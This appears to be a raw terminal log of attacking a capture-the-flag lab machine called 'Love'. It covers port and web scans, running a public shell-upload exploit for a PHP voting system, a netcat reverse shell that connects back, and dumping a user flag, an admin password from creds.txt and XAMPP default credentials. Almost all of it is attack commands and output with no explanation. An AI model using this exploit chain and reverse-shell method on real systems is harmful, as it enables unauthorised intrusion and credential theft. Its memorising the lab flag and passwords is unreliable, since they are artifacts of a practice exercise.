$ nmap -p- -T4 -A 10.10.10.239
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| Kerberos, NCP, NULL, afp:
|_ Host '10.10.14.133' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-05-05T21:46:26+00:00; +32m26s from scanner time.
| tls-alpn:
|_ http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 2h17m26s, deviation: 3h30m01s, median: 32m25s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-05T14:46:07-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-05T21:46:09
|_ start_date: N/A
$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
$ dirb http://10.10.10.239
---- Scanning URL: http://10.10.10.239/ ----
==> DIRECTORY: http://10.10.10.239/admin/
==> DIRECTORY: http://10.10.10.239/Admin/
==> DIRECTORY: http://10.10.10.239/ADMIN/
+ http://10.10.10.239/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/cgi-bin/ (CODE:403|SIZE:302)
+ http://10.10.10.239/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/dist/
+ http://10.10.10.239/examples (CODE:503|SIZE:402)
==> DIRECTORY: http://10.10.10.239/images/
==> DIRECTORY: http://10.10.10.239/Images/
==> DIRECTORY: http://10.10.10.239/includes/
+ http://10.10.10.239/index.php (CODE:200|SIZE:4388)
+ http://10.10.10.239/licenses (CODE:403|SIZE:421)
+ http://10.10.10.239/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/phpmyadmin (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/plugins/
+ http://10.10.10.239/prn (CODE:403|SIZE:302)
+ http://10.10.10.239/server-info (CODE:403|SIZE:421)
+ http://10.10.10.239/server-status (CODE:403|SIZE:421)
+ http://10.10.10.239/webalizer (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/admin/ ----
+ http://10.10.10.239/admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/admin/includes/
+ http://10.10.10.239/admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/Admin/ ----
+ http://10.10.10.239/Admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/Admin/includes/
+ http://10.10.10.239/Admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/Admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/ADMIN/ ----
+ http://10.10.10.239/ADMIN/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/ADMIN/includes/
+ http://10.10.10.239/ADMIN/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/ADMIN/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/Admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/ADMIN/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
Voting System 1.0 Shell Upload
https://packetstormsecurity.com/files/161031/Voting-System-1.0-Shell-Upload.html
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
kali@kali:~/0.htb/machines/Love239$ python3 shellupload.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.239] 53061
b374k shell : connected
Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
C:\xampp\htdocs\omrs\images>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
05/06/2021 06:08 AM <DIR> .
05/06/2021 06:08 AM <DIR> ..
05/06/2021 06:08 AM 5,632 D3fa1t_shell.exe
05/18/2018 08:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 03:53 PM 0 index.html.txt
01/27/2021 12:08 AM 844 index.jpeg
08/24/2017 04:00 AM 26,644 profile.jpg
05/06/2021 06:08 AM 6,495 shell.php
6 File(s) 43,855 bytes
2 Dir(s) 2,232,213,504 bytes free
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
8086de462d74e656846ea860579218e5
C:\xampp\htdocs\omrs\images>cd ..
cd ..
C:\xampp\htdocs\omrs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs
04/13/2021 09:54 AM <DIR> .
04/13/2021 09:54 AM <DIR> ..
04/12/2021 08:27 AM <DIR> admin
04/12/2021 08:29 AM <DIR> bower_components
04/12/2021 08:29 AM <DIR> dist
05/18/2018 10:50 AM 7,480 home.php
05/06/2021 06:08 AM <DIR> images
04/12/2021 08:29 AM <DIR> includes
05/16/2018 12:34 PM 1,572 index.php
05/16/2018 12:31 PM 668 login.php
04/26/2018 01:25 PM 84 logout.php
04/12/2021 08:29 AM <DIR> plugins
05/17/2018 11:02 AM 1,705 preview.php
05/18/2018 10:49 AM 1,502 submit_ballot.php
04/12/2021 08:29 AM <DIR> tcpdf
04/12/2021 08:29 AM <DIR> votesystem
6 File(s) 13,011 bytes
10 Dir(s) 2,232,205,312 bytes free
C:\xampp\htdocs\omrs>
C:\xampp\htdocs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs
04/12/2021 08:29 AM <DIR> .
04/12/2021 08:29 AM <DIR> ..
08/27/2019 07:02 AM 3,607 applications.html
08/27/2019 07:02 AM 177 bitnami.css
04/12/2021 08:16 AM <DIR> dashboard
07/16/2015 08:32 AM 30,894 favicon.ico
04/12/2021 08:29 AM <DIR> FFS
04/12/2021 08:16 AM <DIR> img
07/16/2015 08:32 AM 260 index.php
04/13/2021 09:54 AM <DIR> omrs
04/12/2021 08:29 AM <DIR> passwordmanager
04/12/2021 08:16 AM <DIR> webalizer
04/12/2021 08:16 AM <DIR> xampp
4 File(s) 34,938 bytes
9 Dir(s) 2,208,567,296 bytes free
Directory of C:\xampp\htdocs\passwordmanager
04/12/2021 08:29 AM <DIR> .
04/12/2021 08:29 AM <DIR> ..
04/12/2021 12:25 PM 45 creds.txt
01/27/2021 06:32 PM 4,720 index.php
2 File(s) 4,765 bytes
2 Dir(s) 2,208,235,520 bytes free
C:\xampp\htdocs\passwordmanager>type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!
C:\xampp\webdav>type webdav.txt
type webdav.txt
WEB-DAV für den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente über den Apache2.
Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: http://localhost/webdav/
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben.
Lokales Directory: /xampp/webdav/
C:\xampp>type passwords.txt
type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
WinRM (ports 5985 and 5986)